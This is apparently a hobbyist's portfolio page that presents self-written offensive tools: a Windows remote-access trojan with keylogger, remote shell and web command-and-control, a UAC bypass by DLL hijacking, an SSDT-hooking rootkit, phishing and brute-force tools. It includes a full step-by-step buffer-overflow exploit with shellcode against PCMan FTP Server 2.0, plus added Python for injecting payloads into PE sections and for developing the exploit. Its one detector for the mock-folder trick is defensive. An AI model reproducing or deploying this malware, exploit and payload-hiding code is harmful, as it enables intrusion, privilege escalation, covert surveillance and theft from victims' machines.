Hello friend. Hello friend? That’s lame. Maybe I should give you a name? But that’s a slippery slope. You’re only in my head. We have to remember that. Shit. It’s actually happened. I’m talking to an imaginary person. What I’m about to tell you is top secret. A conspiracy bigger than all of us. There’s a powerful group of people out there that are secretly running the world. I’m talking about the guys no one knows about. The guys that are invisible. The top one percent of the top one percent. The guys that play God without permission. And now I think they’re following me.

Hi! As you can see, I really love the show Mr. Robot. So, I'm from Israel, I'm interested in Windows internals and malware development, and I have currently started studying WiFi hacking. In the future I'll build a device that has all of my tools!
What have I studied before? Windows internals, Windows drivers, the Windows API, C++, C, assembly, web development, a deep understanding of social engineering, basic Arduino, basic Linux, PHP and more...

☕ Buy Me a Coffee (:

Hi! Do you want me to help you with something? I'm here for you!
Soon I'll add a contact email; until then you can send me a message on GitHub! or


Fsociety RAT
Fsociety Phishing Tool
Auto/Manual UAC Bypass
Kernel Rootkit for Windows 32bit
Brute Force
Binary Exploitation

Fsociety RAT

It was really fun to make this project! The project has a lot of features and a good web control panel for the bots. The final malware bypasses UAC, installs the rootkit on 32-bit systems, uses obfuscated strings and an anti-VM technique, does process hollowing, and talks to the control website through curl (curl.exe has shipped with Windows since Windows 10 version 1803, so it is present on current systems but not on older ones).




RAT

Malware Persistence Techniques


✔️ The malware hides the UAC-bypass DLL and the rootkit in new PE sections of its own executable.
✔️ Bypasses UAC by DLL hijacking ComputerDefaults.exe from a mock "Windows " folder (note the trailing space).
✔️ Creates a scheduled task for the malware under the Task Scheduler path "Microsoft\Windows\Security" that runs with highest privileges.
✔️ On a 32-bit system, installs and starts the rootkit.
✔️ On a 64-bit system, falls back to process hollowing.

Malware Attacks

The malware communicates with a control website; these are the current attacks:


✔️ Screenshot
✔️ Task Scheduler
✔️ Remote Shell
✔️ File Manager
✔️ File Explorer
✔️ Keylogger
✔️ Client Info

Website Control Images

Main control website: lists the clients and shows info about them

Victim profile page: contains the attack options




Rootkit

The rootkit is for 32-bit systems. Click to see the Rootkit project on GitHub

What can the Rootkit do?

By hooking the SSDT it can:


✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute)
✔️ Hide Process
✔️ Protect Process, Thread
✔️ Protect Registry Keys (Open\Create\Delete\Set)
✔️ Bypass privilege checks



DLL - Bypass UAC

A DLL that ComputerDefaults.exe loads through DLL hijacking, starting the malware with high integrity.

Click to see the BypassUAC project on GitHub



section_injector

This project injects a file into a new section of another PE file:

   Injector.exe "section name" "target" "file"
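The following Python is an added, stand-alone illustration of what a section injector like this has to do; it is not the section_injector source (a separate Windows program) and the names in it are the editor's. The steps are the same ones `Injector.exe "section name" "target" "file"` implies: parse the PE headers, check that a free IMAGE_SECTION_HEADER slot exists below SizeOfHeaders, append the payload padded to FileAlignment, and fix NumberOfSections and SizeOfImage. build_sample_pe() constructs a minimal dummy PE32 so the example runs offline; extract_section() shows the read-back the malware would do to pull its DLL or rootkit out of the section again.

```python
import struct

# IMAGE_SECTION_HEADER (40 bytes): Name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_READ = 0x40000000


def _align(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def parse_headers(pe: bytes) -> dict:
    """The few header fields an injector needs (offsets are identical for PE32 and PE32+)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)        # NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)   # SizeOfOptionalHeader
    opt = e_lfanew + 24                                        # optional header start
    sect_align, file_align = struct.unpack_from("<II", pe, opt + 32)
    size_of_image, size_of_headers = struct.unpack_from("<II", pe, opt + 56)
    return {"e_lfanew": e_lfanew, "nsec": nsec, "opt": opt, "table": opt + opt_size,
            "sect_align": sect_align, "file_align": file_align,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers}


def sections(pe: bytes) -> list:
    h = parse_headers(pe)
    out = []
    for i in range(h["nsec"]):
        f = SECTION_HDR.unpack_from(pe, h["table"] + i * SECTION_HDR.size)
        out.append({"name": f[0].rstrip(b"\0"), "vsize": f[1], "va": f[2],
                    "raw_size": f[3], "raw_ptr": f[4], "chars": f[9]})
    return out


def inject_section(pe: bytes, name: bytes, payload: bytes,
                   characteristics: int = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ) -> bytes:
    """Append `payload` as a new section called `name` and return the patched file."""
    h = parse_headers(pe)
    if len(name) > 8:
        raise ValueError("section names are at most 8 bytes")
    hdr_off = h["table"] + h["nsec"] * SECTION_HDR.size
    # The new header must fit in the slack between the section table and SizeOfHeaders;
    # growing the headers would mean shifting every section, which this example does not do.
    if hdr_off + SECTION_HDR.size > h["size_of_headers"]:
        raise ValueError("no free section header slot")
    secs = sections(pe)
    if secs:
        last = secs[-1]
        va = _align(last["va"] + max(last["vsize"], last["raw_size"]), h["sect_align"])
    else:
        va = _align(h["size_of_headers"], h["sect_align"])
    raw_ptr = _align(len(pe), h["file_align"])
    raw_size = _align(len(payload), h["file_align"])

    out = bytearray(pe)
    out += b"\0" * (raw_ptr - len(pe))              # pad the file up to FileAlignment
    out += payload.ljust(raw_size, b"\0")            # section body, padded to FileAlignment
    SECTION_HDR.pack_into(out, hdr_off, name.ljust(8, b"\0"), len(payload), va,
                          raw_size, raw_ptr, 0, 0, 0, 0, characteristics)
    struct.pack_into("<H", out, h["e_lfanew"] + 6, h["nsec"] + 1)                       # NumberOfSections
    struct.pack_into("<I", out, h["opt"] + 56, _align(va + len(payload), h["sect_align"]))  # SizeOfImage
    return bytes(out)


def extract_section(pe: bytes, name: bytes) -> bytes:
    """The loader side: find the section by name and read back its VirtualSize bytes."""
    for s in sections(pe):
        if s["name"] == name:
            return pe[s["raw_ptr"]:s["raw_ptr"] + s["vsize"]]
    raise KeyError(name)


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 with one .text section holding a single RET; not a real program."""
    sect_align, file_align = 0x1000, 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                               # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                 # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                               # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                             # ImageBase
    struct.pack_into("<II", opt, 32, sect_align, file_align)
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)                       # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 3)                                    # Subsystem: console
    struct.pack_into("<I", opt, 92, 16)                                   # NumberOfRvaAndSizes
    text = SECTION_HDR.pack(b".text", 0x10, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + file_hdr + opt + text).ljust(0x200, b"\0")
    return bytes(headers + b"\xC3".ljust(0x200, b"\0"))


if __name__ == "__main__":
    patched = inject_section(build_sample_pe(), b".rk", b"hello rootkit")
    for s in sections(patched):
        print(s["name"], hex(s["va"]), hex(s["raw_ptr"]), s["vsize"])
    print(extract_section(patched, b".rk"))
```

The real tool writes the result to disk; here the patched image is returned as bytes so it can be inspected. Note that the check on SizeOfHeaders matters: most compilers leave room for a few extra headers, but if the slack is used up the only options are to overwrite an unused slot or rebuild the file.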



Websites

Fsociety Control Website

This is the control website the malware communicates with to get the commands to execute.

Fsociety Redirect Website

The malware has this website's URL hardcoded; at start-up it fetches the control website's URL from here.
I created this website so that if there is a problem with the control website you can just upload the control website again and change the URL on this website.




Sub Projects

These solutions helped me build the final malware


Initialize RAT

This automates the build of the final malware.


✔️ UPX-packs the DLL file
✔️ Injects the DLL and the rootkit into new sections.

Encoding_Decoding

This helps me obfuscate the strings in the malware.




TODO


* Obfuscate Imports




This project is for EDUCATIONAL PURPOSES ONLY. You alone are responsible for your actions! Happy Hacking (;




BypassUAC

Bypassing UAC on Windows 10 with a mock folder and DLL hijacking


Hey, I make two projects to bypass UAC:


1. Manual


2. Auto


In each folder (Manual/Auto) you will find a README.md file with an explanation!


How does it work?

The program creates a "Windows " folder (with a trailing space). When an auto-elevating executable is started, the check that decides whether it lives in a trusted directory normalizes the path, which drops the trailing space, so "Windows \System32" passes as the real "Windows\System32". The folder itself has to be created through the \\?\ path prefix, because the normal Win32 path handling strips the trailing space as well.
The program copies "ComputerDefaults.exe" into "Windows \System32" and then extracts the DLL from the PE section into "Windows \System32" under the name "Secur32.dll".
Starting that copy of ComputerDefaults.exe makes it auto-elevate and load the planted Secur32.dll from its own directory: a DLL hijack that bypasses UAC. The DLL can start whatever you want, a CMD or the program that does all of this automatically.
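From the defender's side, the folder this technique needs is easy to spot: a directory whose name only becomes "Windows" (or "Program Files") after trailing spaces or dots are stripped, since no legitimate installer creates one. The following Python check is an added example by the editor, not part of the BypassUAC project; the names in it are the editor's, and the sample tree it builds is constructed in a temporary directory with plain paths, so the demo as written reproduces on Linux/macOS (on a real Windows host the trailing-space folder can only be created through the \\?\ prefix, but os.listdir still reports the real name, so the check itself works there too).

```python
import os
import tempfile

# Directory names Windows treats as trusted for auto-elevation (compared lower-cased)
TRUSTED_NAMES = {"windows", "program files", "program files (x86)"}


def find_mock_trusted_dirs(root: str) -> dict:
    """Map each suspicious directory directly under root to the files planted inside it.

    A directory is suspicious when its name differs from a trusted name only by trailing
    spaces or dots: the normal Win32 path functions strip those, which is exactly what the
    bypass relies on, so a legitimate tool never ends up creating such a folder."""
    hits = {}
    for name in os.listdir(root):
        top = os.path.join(root, name)
        if not os.path.isdir(top):
            continue
        stripped = name.rstrip(" .")
        if stripped == name or stripped.lower() not in TRUSTED_NAMES:
            continue
        planted = []
        for dirpath, _dirs, files in os.walk(top):
            for f in files:
                rel = os.path.relpath(os.path.join(dirpath, f), top)
                planted.append(rel.replace(os.sep, "/"))
        hits[name] = sorted(planted)
    return hits


def build_sample_tree() -> str:
    """Constructed demo layout (not a real system): a genuine Windows folder, a mock
    "Windows " folder holding the planted ComputerDefaults.exe copy and Secur32.dll,
    and an innocent Program Files. Uses plain paths, so it reproduces on Linux/macOS."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "Windows", "System32"))
    os.makedirs(os.path.join(root, "Windows ", "System32"))
    os.makedirs(os.path.join(root, "Program Files"))
    for f in ("ComputerDefaults.exe", "Secur32.dll"):
        open(os.path.join(root, "Windows ", "System32", f), "wb").close()
    return root


if __name__ == "__main__":
    print(find_mock_trusted_dirs(build_sample_tree()))
    # {'Windows ': ['System32/ComputerDefaults.exe', 'System32/Secur32.dll']}
```

On a live system the check would be pointed at the root of the system drive; the planted file list is what you would hand to incident response, since the hijacked DLL name tells you which auto-elevating binary was abused.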









Kernel Rootkit

Introduction

Hey, after I read the books:


"Windows Kernel Programming" by Pavel Yosifovich
"The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System 2nd Edition" by Bill Blunden

I decided to create a kernel rootkit for 32-bit systems.
Now I'll start learning how to create a kernel rootkit for 64-bit!
Enjoy.

What can the Rootkit do?

By hooking the SSDT (which is why it targets 32-bit only: on x64, Kernel Patch Protection detects a modified SSDT and crashes the system) it can:

✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute)
✔️ Hide Process
✔️ Protect Process, Thread
✔️ Protect Registry Keys (Open\Create\Delete\Set)
✔️ Bypass privilege checks







Fsociety Phishing Tool

I built this tool 2 years ago using Python. On the project's GitHub page you can find which websites you can spoof.








Brute Force Attack

Like the Fsociety Phishing Tool, I built this tool 2 years ago using Python.
The project is on GitHub here and has the following brute-force features:



✔️ Gmail

✔️ SSH

✔️ WIFI

✔️ Zip








Exploit Writeups - GitHub
PCMAN's FTP Server 2.0

Hey, this is my first exploit writeup post, for practising binary exploitation on Windows! I made myself a folder with a lot of vulnerable programs, each under a random name like 48504, and then I pick one randomly and start investigating and exploiting it.

File: 9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z


Challenge 1: 45745

After extracting I can see that the exe file name is PCManFTPD2. From the name I can assume that this program is an FTP server or at least uses the FTP protocol.

When I run the program I can confirm that it is an FTP server. All of the text in the server is in Chinese, so it's kind of hard to understand the program.

"PCMan’s FTP Server 2.0 – Copyright © 2005"

After playing a little with the server I can see that it accepts USER anonymous and PASS anonymous to log in.


Fuzzing

I tried to fuzz the USER command of the server using the SPIKE tool on Kali Linux with the following command:

  generic_send_tcp 192.168.106.138 21 spike.spk 0 0



The spike.spk file will look like this:

            s_readline();
            s_string("USER ");
            s_string_variable("0");

And the result is:



We successfully crashed the program!!


Finding the EIP Offset


Let's create a pattern using the following command in Kali Linux:

    msf-pattern_create -l 5000

Now we can start writing our exploit. I'll write my exploit in C++ in Visual Studio.

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite

                EIP offset: 

                badchars:

            */

            std::string pattern = "…";

            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);

                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);

                std::string exploit = pattern;

                // Start the exploit
                c.Send(exploit);


                return 0;
            }
                    

After we run this program you can see that the FTP server crashed, and EIP has been overwritten with the value 43396F43.

Using the following command we can get the offset of the EIP:



And we can see that the offset is 2007
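To show what the offset lookup actually does, here is an added Python reimplementation of msf-pattern_create and msf-pattern_offset (editor's example, not part of the original writeup or of the Metasploit code): it generates the same cyclic pattern and searches for the crash value 43396F43 as the little-endian bytes "Co9C" that were sitting on the stack, which resolves to offset 2007 as in the writeup.

```python
import string

PATTERN_ATOMS = [(u + l + d).encode()
                 for u in string.ascii_uppercase
                 for l in string.ascii_lowercase
                 for d in string.digits]        # Aa0, Aa1, ..., Zz9: 6760 three-byte atoms


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the same order msf-pattern_create uses (repeats after 20280 bytes)."""
    full = b"".join(PATTERN_ATOMS)
    reps = length // len(full) + 1
    return (full * reps)[:length]


def pattern_offset(value, length: int = 5000) -> int:
    """Offset of `value` inside pattern_create(length), or -1 if it is not there.

    An int is taken as the register value shown in the debugger (e.g. 0x43396F43) and is
    searched as the little-endian bytes that were actually in the buffer; bytes/str are
    searched as given. Only the first match is returned, like msf-pattern_offset's default,
    so double-check with a second crash value if the pattern was longer than 20280 bytes."""
    if isinstance(value, int):
        needle = value.to_bytes(4, "little")
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # The EIP value from the PCMan crash resolves to 2007, matching the writeup.
    print(pattern_offset(0x43396F43))
```

The reason a four-byte value pins down one position is that every three-byte atom is unique within the first 20280 bytes, so any aligned four-byte window occurs exactly once there.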


Overwrite the EIP


Let's see if we can overwrite EIP with "BBBB":

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
            
                EIP offset: 43396F43  ->  [*] Exact match at offset 2007
            
                badchars:
            
            */
            
            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);
            
                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);
            
                // Generate A's
                int offset = 2007;
                std::string A = MultipleString("A", offset);
            
                // Generate padding
                std::string padding = MultipleString("D", 5000 - offset - 4);
            
                std::string exploit = A + "BBBB" + padding;
            
                // Start the exploit
                c.Send(exploit);
            
                return 0;
            }
                

Run the program with the server in Immunity Debugger and see that it works! EIP is now "42424242".
We successfully overwrote EIP!


Find JMP ESP


The next step in our exploit is the jump to our shellcode.
Using mona we can search for a JMP ESP, I use the following command in Immunity Debugger:

   !mona jmp -r ESP

It seems that mona did not find a JMP ESP in any module without ASLR, DEP or SafeSEH... I'll keep this first exploit simple and just search for a JMP ESP in KERNEL32.dll:

   !mona jmp -r ESP -m KERNEL32.dll

And the result is:

                    Address =    7667E8F3
                    Message =    0x7667e8f3 (b+0x0003e8f3)  : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)

Note that mona flags kernel32.dll as ASLR: True and Rebase: True, so 0x7667E8F3 is only valid for the current boot of this particular Windows 7 build (6.1.7601.18015); after a reboot or on another machine the address has to be found again. Current exploit:

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
                ----------------------------------------------

                EIP offset: 43396F43  ->  [*] Exact match at offset 2007

                JMP ESP:
                    Address=	7667E8F3  ->  "\xf3\xe8\x67\x76"
                    Message=	0x7667e8f3 (b+0x0003e8f3)  : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
                                



                badchars:

            */

            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);

                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);

                // Generate A's
                int offset = 2007;
                std::string A = MultipleString("A", offset);

                // Generate padding
                std::string padding = MultipleString("D", 5000 - offset - 4);

                std::string exploit = A + "\xf3\xe8\x67\x76" + padding;

                // Start the exploit
                c.Send(exploit);

                return 0;
            }

                

Find Bad Characters


This is not a tutorial, so I just generated the bad characters and will tell you what I found:

The bad characters I found are the following:

   “\x0a\x0d”

Calculator Shellcode:


I will use this calculator shellcode (74 bytes: it walks the PEB to kernel32, resolves WinExec and runs "calc") for our exploit:

            char calc_shellcode[] =
                "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
                "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
                "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
                "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
                "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
                "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7";     

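As an added example (the editor's code, not the author's), the following Python helpers cover the bad-character step that the writeup skips over and then check the pieces above: they build the test string to send after the EIP offset, compare what was sent with what comes back from the debugger's memory dump, and confirm that the JMP ESP address and the calculator shellcode contain none of \x00, \x0a or \x0d. The shellcode bytes are the ones from the writeup; the truncated dump in the demo is constructed, not captured from PCMan.

```python
# Calculator shellcode from the writeup (74 bytes; walks the PEB to kernel32,
# resolves WinExec and runs "calc").
CALC_SHELLCODE = bytes.fromhex(
    "31d2526863616c6389e65256648b72308b760c8b760cad8b308b7e188b5f3c8b"
    "5c1f788b741f2001fe8b4c1f2401f942ad813c0757696e4575f50fb75451fe8b"
    "741f1c01fe033c96ffd7"
)
JMP_ESP = b"\xf3\xe8\x67\x76"      # 0x7667E8F3 little-endian, from the mona result above
KNOWN_BAD = b"\x00\x0a\x0d"        # NUL plus the two bytes the writeup found


def badchar_test_string(exclude: bytes = b"\x00") -> bytes:
    """Every byte value except the ones already known to be bad (start with just \\x00).

    Send this right after the EIP offset, then dump memory at ESP and compare."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def first_divergence(sent: bytes, seen: bytes):
    """Compare the bytes sent with the bytes read back from the dump.

    Returns (index, sent_byte, seen_byte) for the first mismatch, with seen_byte None
    when the dump simply ends early; returns None when everything arrived intact."""
    for i, (a, b) in enumerate(zip(sent, seen)):
        if a != b:
            return (i, a, b)
    if len(seen) < len(sent):
        return (len(seen), sent[len(seen)], None)
    return None


def find_badchars(buf: bytes, bad: bytes = KNOWN_BAD) -> list:
    """[(offset, value)] for every occurrence of a bad byte in buf: the final payload check."""
    badset = set(bad)
    return [(i, b) for i, b in enumerate(buf) if b in badset]


def payload_is_clean(bad: bytes = KNOWN_BAD) -> bool:
    """The part of the exploit that must survive intact: return address, NOP sled, shellcode."""
    return not find_badchars(JMP_ESP + b"\x90" * 20 + CALC_SHELLCODE, bad)


if __name__ == "__main__":
    # Constructed dump: the server's line parser stops at the first \x0a, so the
    # debugger shows the test string cut off right there.
    sent = badchar_test_string()
    seen = sent[:sent.index(0x0a)]
    print(first_divergence(sent, seen))   # (9, 10, None): \x0a is bad, exclude it and resend
    print(payload_is_clean())             # True
```

The loop in practice is: send, compare, add the first divergent byte to the exclusion list, resend, until first_divergence() returns None; a byte that is replaced rather than truncating the buffer shows up with a non-None seen_byte.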
Final Exploit


The final exploit is:

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
                ----------------------------------------------

                EIP offset: 43396F43  ->  [*] Exact match at offset 2007

                JMP ESP:
                    Address=	7667E8F3  ->  "\xf3\xe8\x67\x76"
                    Message=	0x7667e8f3 (b+0x0003e8f3)  : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
                                
                badchars: "\x0a\x0d"

            */

            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);

                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);

                // Generate A's
                int offset = 2007;
                std::string A = MultipleString("A", offset);

                // Generate nopsled
                std::string nops = MultipleString("\x90", 20);

                // Shellcode
                char calc_shellcode[] =
                    "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
                    "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
                    "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
                    "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
                    "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
                    "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7";

                // Generate padding (sizeof counts the string's NUL terminator, so subtract 1 to get the real 74-byte shellcode length)
                std::string padding = MultipleString("D", 5000 - offset - 4 - nops.length() - (sizeof(calc_shellcode) - 1));

                std::string exploit = A + "\xf3\xe8\x67\x76" + nops + calc_shellcode + padding;

                // Start the exploit
                c.Send(exploit);

                return 0;
            }

Thanks for reading!